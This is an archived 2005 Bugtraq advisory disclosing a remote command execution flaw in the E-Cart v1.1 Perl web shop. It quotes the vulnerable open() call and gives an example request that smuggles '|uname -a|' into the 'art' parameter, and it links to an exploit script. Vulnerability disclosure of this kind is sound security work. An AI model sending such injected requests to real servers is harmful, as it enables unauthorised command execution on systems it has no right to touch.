E-Cart v1.1 Remote Command Execution

To: bugtraq@xxxxxxxxxxxxxxxxx, news@xxxxxxxxxxxxxx, bugs@xxxxxxxxxxxxxxxxxxx, submissions@xxxxxxxxxxxxxxxxxxxxxxx, vuln@xxxxxxxxxxx
Subject: E-Cart v1.1 Remote Command Execution
From: Nicolas Montoza <xonico@xxxxxxxxx>
Date: Sat, 23 Apr 2005 14:24:29 -0300
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=PjLx+yuyzxO5tl40LR4InyFd2HRppfULWoGI2A/lXtE50a037RZFVb0dnIsSO6GwY49KZdqLaQceHpgePOeETZOJxc2V/EuSF8+KGuhLFp8XDrfqW/Ge/zLwHsxdlBg0pUJomqaAootmvL2Md0cfJ83RbDF6aYWH/VeTZeNW/pE=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Reply-to: Nicolas Montoza <xonico@xxxxxxxxx>

============================================================
Title: E-Cart v1.1 Remote Command Execution
Vulnerability discovery: SoulBlack - Security Research -
http://soulblack.com.ar
Date: 20/04/2005
Severity: High. Remote Users Can Execute Arbitrary Code.
Affected version: <= E-Cart 2004 v1.1
Vendor: http://www.yazaport.com/kadfors/kwamd/mods/ecart/index.cgi
============================================================

============================================================
*Summary
E-Cart is a mod of WepApp written in Perl. It is WebShop.
============================================================
*Problem Description:

The bug is in the file index.cgi where the variable art that is put
under "open()", does
not have a control of data, allowing to the attacker to execute any
type of commands.

Vulnerable code
---------------
sub viewart {
   &cartfooter;
   open(DATA, "$catdir/$info{'cat'}/$info{'art'}"); hold(DATA);
chomp(@data = <DATA>); release(DATA); close(DATA);
       ...
       ...
       ...

============================================================

*Example:

http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|uname%20-a|

============================================================

*Xpl:

http://www.soulblack.com.ar/repo/tools/ecart-xpl.php

============================================================

*Fix:

Contact the Vendor.
============================================================
--
SoulBlack - Security Research
http://www.soulblack.com.ar

Prev by Date: Re: [HACKERS] Postgres: pg_hba.conf, md5, pg_shadow, encrypted
Next by Date: Re: [HACKERS] Postgres: pg_hba.conf, md5, pg_shadow, encrypted
Previous by thread: Local file detection found through Adobe Reader ActiveX control
Next by thread: TSLSA-2005-0015 - postgresql
Index(es):
- Date
- Thread